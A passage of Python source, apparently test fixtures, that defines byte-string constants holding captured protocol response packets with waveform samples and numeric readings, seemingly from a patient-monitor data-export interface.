b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x08\x11\x00\x01\x01\x0a" \ b"\x09\x6e\x01\x06\x01\x3d\x04\x00\x01\x00\x1f\xed\x1f\xeb\x1f\xeb" \ b"\x1f\xe9\x1f\xe9\x1f\xe7\x1f\xe7\x1f\xe7\x1f\xe5\x1f\xe5\x1f\xe3" \ b"\x1f\xe3\x1f\xe3\x1f\xe1\x1f\xe3\x1f\xe1\x1f\xe1\x1f\xdf\x1f\xdf" \ b"\x1f\xdd\x1f\xdd\x1f\xdb\x1f\xd9\x1f\xd9\x1f\xd9\x1f\xd9\x1f\xdd" \ b"\x1f\xdd\x1f\xdd\x1f\xdf\x1f\xdf\x1f\xdf\x1f\xe3\x1f\xe3\x1f\xe5" \ b"\x1f\xe5\x1f\xe5\x1f\xe7\x1f\xe9\x1f\xe9\x1f\xeb\x1f\xeb\x1f\xeb" \ b"\x1f\xed\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf7\x1f\xf7\x1f\xf9\x1f\xfb\x1f\xfd" \ b"\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x07\x8e\x00\x01\x00\x4a" \ b"\x09\x6e\x00\x46\x4b\xb4\x04\x00\x00\x40\x06\x0e\x06\x05\x05\xfb" \ b"\x05\xef\x05\xe0\x05\xd0\x05\xbe\x05\xab\x05\x95\x05\x7f\x05\x66" \ b"\x05\x4d\x05\x33\x05\x18\x04\xfc\x04\xe1\x04\xc6\x04\xab\x04\x91" \ b"\x04\x78\x04\x60\x04\x4b\x04\x37\x04\x26\x04\x18\x04\x0d\x04\x05" \ b"\x04\x01\x04\x00\x04\x04\x04\x0b\x04\x18" rsp_wave_8_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\x68\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x28\x04\x3e\x04\x57\x04\x76\x04\x99\x04\xc0\x04\xec" \ b"\x05\x1d\x05\x51\x05\x89\x05\xc5\x06\x05\x06\x47\x06\x8c\x06\xd3" \ b"\x07\x1c\x07\x67\x07\xb3\x07\xff\x08\x4c\x08\x99\x08\xe4\x09\x2f" \ b"\x09\x78\x09\xbf\x0a\x03\x0a\x44\x0a\x83\x0a\xbd\x0a\xf3\x0b\x25" \ b"\x0b\x53" rsp_wave_8_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\x70\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x20\x04\x20\x0c" \ b"\x20\x14\x20\x1c\x20\x26\x20\x2f\x20\x38\x20\x42\x20\x4b\x20\x55" \ b"\x20\x5e\x20\x68\x20\x71\x20\x7a\x20\x83\x20\x8d\x20\x96\x20\x9f" \ b"\x20\xa8\x20\xad\x20\xab\x20\xa6\x20\x9e\x20\x95\x20\x8c\x20\x82" \ b"\x20\x78\x20\x6e\x20\x63\x20\x59\x20\x4f\x20\x45\x20\x3a\x20\x30" \ b"\x20\x26\x20\x1c\x20\x12\x20\x08\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0" \ b"\x1f\xee\x1f\xed\x1f\xed\x1f\xec\x1f\xec\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\xa0\x84\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x20\x00\x20\x02" \ b"\x20\x04\x20\x08\x20\x08\x20\x0b\x20\x10\x20\x12\x20\x15\x20\x17" \ b"\x20\x1a\x20\x1c\x20\x1f\x20\x22\x20\x25\x20\x27\x20\x2a\x20\x2d" \ b"\x20\x30\x20\x33\x20\x33\x20\x32\x20\x30\x20\x2f\x20\x2a\x20\x28" \ b"\x20\x24\x20\x22\x20\x1f\x20\x1d\x20\x19\x20\x17\x20\x14\x20\x12" \ b"\x20\x0e\x20\x0c\x20\x0a\x20\x06\x20\x03\x20\x01\x1f\xff\x1f\xfe" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\xa1\x04\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x20\x03\x20\x09" \ b"\x20\x0f\x20\x13\x20\x1d\x20\x23\x20\x27\x20\x2f\x20\x35\x20\x3d" \ b"\x20\x43\x20\x4b\x20\x51\x20\x57\x20\x5d\x20\x65\x20\x6b\x20\x71" \ b"\x20\x77\x20\x79\x20\x77\x20\x73\x20\x6d\x20\x65\x20\x61\x20\x59" \ b"\x20\x53\x20\x4b\x20\x43\x20\x3b\x20\x35\x20\x2d\x20\x25\x20\x1d" \ b"\x20\x17\x20\x0f\x20\x07\x20\x01\x1f\xfb\x1f\xf5\x1f\xf3\x1f\xf1" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x0b\x7b\x0b\x9f\x0b\xbd\x0b\xd5\x0b\xe8\x0b\xf6\x0b\xfe" \ b"\x0c\x00\x0b\xfc\x0b\xf3\x0b\xe5\x0b\xd2\x0b\xba\x0b\x9d\x0b\x7b" \ b"\x0b\x56\x0b\x2c\x0b\x00\x0a\xd0\x0a\x9d\x0a\x68\x0a\x31\x09\xf9" \ b"\x09\xbf\x09\x85\x09\x4b\x09\x10\x08\xd7\x08\x9e\x08\x66\x08\x30" \ b"\x07\xfb" rsp_wave_8_no_4 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x03\x0e\x80\x78\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xee\x1f\xee" \ b"\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xef\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0\x1f\xf0" \ b"\x1f\xf0\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2\x1f\xf2" \ b"\x1f\xf2\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4\x1f\xf4" \ b"\x1f\xf4\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf4\x1f\xf3\x1f\xf3\x1f\xf2" \ b"\x1f\xf1\x1f\xf0\x1f\xf0\x1f\xef\x1f\xed\x1f\xed\x1f\xec\x1f\xeb" \ b"\x1f\xea\x1f\xe9\x1f\xe8\x1f\xe7\x1f\xe6\x1f\xe5\x1f\xe4\x1f\xe3" \ b"\x1f\xe2\x1f\xe1\x1f\xe0\x1f\xdf\x1f\xde\x1f\xdd\x1f\xdc\x1f\xdb" \ b"\x1f\xda\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ b"\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe" \ b"\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x1f\xfe\x20\x00\x20\x00" \ b"\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00\x20\x00" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x20\x00\x1f\xff\x1f\xff\x1f\xfe" \ b"\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfa\x1f\xf9" \ b"\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xf9\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7" \ b"\x1f\xf8\x1f\xf7\x1f\xf8\x1f\xf7\x1f\xf6\x1f\xf7\x1f\xf6\x1f\xf7" \ b"\x1f\xf6\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xef\x1f\xf1\x1f\xf1" \ b"\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf5\x1f\xf5\x1f\xf5\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3" \ b"\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf1\x1f\xf1\x1f\xf1\x1f\xf1" \ b"\x1f\xef\x1f\xef\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xeb\x1f\xeb" \ b"\x1f\xe9\x1f\xe9\x1f\xe7\x1f\xe7\x1f\xe7\x1f\xe5\x1f\xe5\x1f\xe3" \ b"\x1f\xe3\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x07\xc9\x07\x99\x07\x6b\x07\x40\x07\x18\x06\xf3\x06\xd2" \ b"\x06\xb3\x06\x97\x06\x7f\x06\x69\x06\x57\x06\x47\x06\x3a\x06\x2f" \ b"\x06\x27\x06\x21\x06\x1d\x06\x1a\x06\x19\x06\x19\x06\x1a\x06\x1b" \ b"\x06\x1d\x06\x1e\x06\x20\x06\x20\x06\x20\x06\x1f\x06\x1d\x06\x1a" \ b"\x06\x15" rsp_nu_9_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\xaf\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ 